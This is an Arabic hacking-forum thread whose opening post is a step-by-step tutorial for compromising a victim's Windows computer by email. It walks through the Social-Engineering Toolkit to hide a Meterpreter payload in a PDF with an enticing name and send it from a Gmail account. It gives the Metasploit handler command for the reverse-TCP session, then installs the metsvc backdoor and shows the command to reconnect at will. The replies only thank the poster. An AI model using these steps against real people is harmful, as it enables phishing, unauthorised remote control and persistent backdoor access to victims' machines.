اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

الاختراق بالهندسة الاجتماعية

الاختراق بالهندسة الاجتماعية


النتائج 1 إلى 8 من 8

الموضوع: الاختراق بالهندسة الاجتماعية

  1. #1
    هكر مبتديء Array
    تاريخ التسجيل
    Jun 2010
    المشاركات
    1

    Hasri الاختراق بالهندسة الاجتماعية



    بسم الله الرحمن الرحيم ..

    اعود اليكم احبتي في الله بعد غياب طويل بسبب ضروف الدراسة التي لازمتني رغما عني ..

    عموما .. ان شاء الله اليوم الدرس يعوض ولو شيء بسيط بعد هالغيبة الطويلة عن المنتدى !

    اليوم بنتكلم عن الاختراق بالهندسة الاجتماعية ( Social Engineering ) و هي ما يعرف باقناع الضحية بما حوله من البيئة المحيطة به على الانترنت او ايا كان .. و لا يخفى على الجميع ان اشهر مهندس اجتماعي هو كيفين ميتنيك

    بحاول اني ما اخرج عن الموضوع .. ( باختصار هي التلاعب بالناس لفعل ما تريد لكي تحصل على ما تريد )

    بصراحة و بالنسبة لي .. تعتبر الهندسة الاجتماعية سلآح فتاك و خطير لانها لا تتوقف على اقفال ثغرة معينة او حماية للنظام و ما الى ذلك .. لانه بعد اقناع الضحية لا شيء يقف امام الوصول لما تريد .

    ================================================== ========

    نرجع لموضوعنا ..

    كيف تتم العملية ؟

    1-عن طريق اداة من صناعة المبرمج ديفيد كنيدي ( مبرمج الفاست تراك )
    2-حقن بايلود مشفر من جميع الحمايات بكتاب الكتروني بصيغة pdf
    3-ارسال الملف لبريد الضحية على الانبوكس
    4-التنصت و الانتظار حتى يتم الاتصال بالضحية

    ماهي الادوات اللازمة للقيام بالعملية ؟


    1-Social-Engineering Toolkit
    2-Gmail account
    3-M3tasploit

    طبعا كل الادوات متوفرة على الباك تراك الا Social-Engineering Toolkit سوف نقوم بتحميلها و صنع مجلد لها

    نبدا مع اول امر وهو لتحميل الاداة و صنع مجلد لها

    كود:

    svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

    ملاحظة : يجب ان تكون root ..

    صورة للتوضيح بعد تطبيق الامر و تكوين المجلد :




    الان ندخل على مجلد الاداة بالامر :

    كود:

    cd SET

    من ثم نشغل الادة عن طريق الامر :

    كود:

    ./set

    و هذي صورة توضيحية للامرين ..




    اشرح لكم الخيارات ..

    الخيار رقم 1 لعمل هندسة اجتماعية عبر الايميل ..

    الخيار رقم 2 لعمل هندسة اجتماعية عبر صفحات الويب

    و الخيارات الباقية للتحديث و صنع بايلودات ..

    عموما هجومنا هو رقم 1 اللي يتم عن طريق الايميل ..

    نختار الخيار الاول بالرقم 1 و نشوف :



    مثل ماهو واضح بالصورة .. طلع لنا خيارين ثانية نختار الخيار الاول بالرقم 1 ثم راح يسالك اذا تبي تكون بايلود او لا نختار نعم



    الان ظهر لنا عدة خيارات لطريقة زرع البايلود اللي تبي تكونه داخل الكتاب الالتروني ..

    نختار رقم 4 لانه هو الفعال دائما .. اما الباقي فهو عن طريق ثغرات اي ان هناك احتمال بعدم نجاح العملية ..

    و بعد ما اخترنا الاستغلال المناسب .. الان نحدد البايلود المناسب و يفضل Meterpreter



    الان اكتملت الاعدادات و تم صناعة الملف و البايلود بنجاح ..

    نضغط انتر لاستكمال العملية و ارسال الملف

    بيظهر لك خيارين .. الاول اذا كنت تبي تترك اسم الملف زي ماهو تختاره ..

    الثاني يقلك لا .. لازم اظهر بمظهر اكثر جاذبية للضحية

    طبعا اكيد نختار الخيار الثاني و نسمي الملف باسم جذاب ..




    الان ايضا .. ظهر لنا خيارين جديدة الخيار الاول يعني ارسال الملف لايميل واحد فقط
    اما الخيار الثاني فهو لارسال الملف لعدة ايميلات !

    نختار الخيار الاول .. بالرقم 1 < انت بامكانك تختار الخيار الثاني

    بعد ما اخترنا الخيار الاول الان ظهرت لنا خيارات اخرى تفيد عنوان الرسالة و ما بداخلها

    طبعا يوجد اكثر من خيار .. بالنسبة لي انا اعجبتني الرسالة رقم 4 و انت اذا ما عجبك شيء بامكانك تكتب رسالة اخرى من تاليفك بالرقم 6




    بعد ما حددنا الرسالة المطلوبة الان يطلب منا تحديد الايميل المراد استهدافه ..

    نحدده و نتبع الخيارات المتبقية ..



    بعد ما تم تحديد ايميل الضحية .. طلب منا عنوان المرسل فاخترت عن طريق حساب gmail و ادخلت الحساب و الباسورد .. و من ثم طلب مني اذا كنت ابي اتنصت و لا لا و اخترت لا لاني بعد شوي راح اتنصت يدويا افضل ..

    الان تم ارسال الرسالة وش رايكم نشوف كيف شكلها ؟



    .. واضحة الرسالة و الملف مرفق معها .. و بنفس عنوان الرسالة اللي اخترناه قبل شوي !

    طيب الان نتنصت لانتظار الضحية بالامر :

    كود:

    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=5555 E


    الان نلاحظ الصورة بعد ما تنصتنا و بعد ما فتح الضحية الملف ظهور جلسة جديدة !



    ================================================== ========

    اضافة بسيطة و مفيدة جدا

    و هي ثبات الضحية و المقدرة للرجوع اليه في اي وقت تحبه .. وهو ما يعرف بالـ metsvc

    حلوو ..

    بعد ما وصلنا لجهاز الضحية مثل ماهو وآضح فوق راح ننفذ امر بسيط جدا لتثبيت خدمة الـ metsvc

    كود:

    run metsvc



    لان بعد تنصيب الخدمة و في حال خروج الضحية ..

    تقدر ترجع للضحية بالامر التالي :

    كود:

    ./msfcli exploit/multi/handler PAYLOAD=windows/metsvc_bind_tcp LPORT=31337 RHOST=192.168.1.3 E

    بحيث RHOST= اي بي الضحية و LPORT= البورت تبع الخدمة وهو ثابت

    نلاحظ الصورة



    Finished



  2. #2
    هكر مجتهد Array الصورة الرمزية S.N_StrawHat
    تاريخ التسجيل
    Mar 2011
    الدولة
    Grand Line
    المشاركات
    528

    افتراضي رد: الاختراق بالهندسة الاجتماعية

    مشكور على الموضوع الروعة ....... والله غريب أمر الناس


    تحياتي


  3. #3
    هكر مجتهد Array
    تاريخ التسجيل
    Jan 2010
    الدولة
    تونس tunisi
    المشاركات
    314

    افتراضي رد: الاختراق بالهندسة الاجتماعية

    مشكور صديقي انا لا افهم ابدا في هذه المواضيع لكن موضوعك قدم لي فكرة دراسة هذه الطريقة



  4. #4
    هكر متميز Array الصورة الرمزية حوطي505
    تاريخ التسجيل
    Jan 2011
    الدولة
    السعودية
    المشاركات
    1,789

    افتراضي رد: الاختراق بالهندسة الاجتماعية

    بارك الله فيك
    ونتمنى لك ان تكون في تمام الصحه والعافيه
    ولك جزيل الشكر خيووو
    تقبل مروري
    ~^



  5. #5
    هكر مجتهد Array الصورة الرمزية السيابي
    تاريخ التسجيل
    Mar 2011
    الدولة
    سلطنة عمان
    المشاركات
    617

    افتراضي رد: الاختراق بالهندسة الاجتماعية

    مشكوووووووووووور على المجهود


  6. #6
    هكر متميز Array الصورة الرمزية Mad Devil
    تاريخ التسجيل
    Mar 2011
    الدولة
    Grand Line
    المشاركات
    647

    افتراضي رد: الاختراق بالهندسة الاجتماعية

    واصل ابداعك المتميز .... مشكورر يالغالي

    تحياتي لمن دمر حياتي



  7. #7
    هكر متميز Array الصورة الرمزية مهكر القلوب
    تاريخ التسجيل
    Nov 2010
    الدولة
    نهاية العالم
    المشاركات
    1,790

    افتراضي رد: الاختراق بالهندسة الاجتماعية

    تسلم يا الغالي


  8. #8
    هكر مجتهد Array الصورة الرمزية HaCkeRz3_____ AaLlGEEr!Ia
    تاريخ التسجيل
    Apr 2011
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    385

    افتراضي رد: الاختراق بالهندسة الاجتماعية

    مشكور اخي و بارك الله فيك اتمنى الخير و الجنة لكل مسلم
    سلام اخوكم في الله عبد الحق


المواضيع المتشابهه

  1. برنامج الاختراق الخطير Turkoj4n معرب مع الشرح جاهز للاختراق - تعلم الاختراق
    بواسطة ابو خالد 305 في المنتدى قسم المواضيع المخالفة والمكررة
    مشاركات: 207
    آخر مشاركة: 03-11-2012, 07:10 AM
  2. ماهي اشهر اساليب الاختراق ووكيف يتم الاختراق
    بواسطة DR.X في المنتدى منتدى الإختراق العام
    مشاركات: 8
    آخر مشاركة: 03-30-2011, 11:24 AM
  3. ألاسطوانة الاحترافية للتشفير بالهندسة العكسية علي الaljyyosh
    بواسطة hkr1960 في المنتدى أدوات اختراق الاجهزة والدمج والتشفير
    مشاركات: 7
    آخر مشاركة: 12-26-2010, 11:44 PM
  4. تم الاختراق من قبل غامض1960
    بواسطة hkr1960 في المنتدى معرض الانجازات
    مشاركات: 13
    آخر مشاركة: 08-18-2010, 02:36 AM
  5. كيفية الاختراق وربط no-ip ببرنامج الاختراق
    بواسطة xp2 في المنتدى قسم اختراق الأجهزة
    مشاركات: 12
    آخر مشاركة: 05-27-2010, 03:24 AM

وجد الزوار هذه الصفحة بالبحث عن:

الاختراق بالهندسة الاجتماعية

تعلم الاختراق بالهندسة الاجتماعية

المهندس الاجتماعى هكر

كيفية اختراق بالهندسة الاجتماعيه

شرح الاختراق والهندسة الاجتماعية

الاختراق والهندسة الاجتماعية

كيفية اختراق فايسبوك بالهندسة الاجتماعية

الهندسة الاجتماعية الاختراق

الاختراق في الهندسة الاجتماعية

الاختراق هندسة اجتماعية

تعليم الاختراق بالهندسة الاجتماعيه

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •